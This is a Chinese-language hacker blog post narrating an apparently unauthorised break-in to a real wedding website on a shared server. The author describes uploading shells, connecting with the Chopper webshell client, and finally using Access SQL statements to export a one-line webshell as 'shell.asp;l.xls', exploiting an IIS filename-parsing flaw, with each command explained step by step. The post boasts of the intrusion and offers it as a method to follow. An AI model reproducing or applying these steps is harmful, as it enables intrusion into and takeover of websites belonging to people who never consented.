入侵某网站拿shell,结果权限异常的死,估计是哪个变态配的。好在支持ASPX,ASPX一系列动作后,服务器依旧下不来。在ASPX上看上一个婚庆网站的源码,丢了把菜刀,结果怎么连都连不上。后来查了下这个网站跟目前所处的服务器居然不是同一台:
于是根据所有服务器的源码摸瞎了一把,结果数据库,配置十有八九都是对的。
此网站目录下约有子站10多个,主站MD5破不出来,子站大多都是像这样2的后台:
只有继续找,最后找到一个未开封的马克思,看到配置文件是config.asp,结果一激动想都没想直接一句话网站名称,结果尼玛一句话是写上去了,但是被转义了,搞得后台也进不去了。只有继续找,又囧了,尼玛今晚真JB背:
丢弃继续找,找到个数据库可以备份的,坑爹的玩意儿:
备份不能用,压缩这也用不了:
刚想夸那个变态安全做得好,结果爆彩蛋了~
可以执行Access语句,有希望了,导出一句话,执行代码:
by create table cmd (a varchar(50))
insert into cmd (a) values ('')
select * into [a] in ’D:\wwwroot\shell.asp;l.xls’ ’excel 4.0;’ from cmd;
drop table cmd;
解释下:
create table cmd (a varchar(50)) 建立一个有一个a字段的表 表名为cmd字段类型为字符 长度为50
insert into cmd (a) values (‘’) 在表cmd的a字段插入密码为#的一句话木马
select * into [a] in ’D:\wwwroot\shell.asp;l.xls’ ’excel 4.0;’ from cmd 把表cmd的内容导出为物理路径的一个excel文件,为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们导出为excel后在利用IIS解析漏洞就可以变成我们要的木马了。
drop table cmd 删表.
这里最容易出错的就是第三句了,如果你不知道路径怎么办~ 呵呵,我们有它源码嘛,暴他路径:
没有源码怎么办,猜去嘛! 完事试一下,可以解析,但是报点小错:
菜刀连下,over,大功造成:
好了,过程有些曲折,中间有些大意导致费了不少时间,以我为鉴,呵呵~
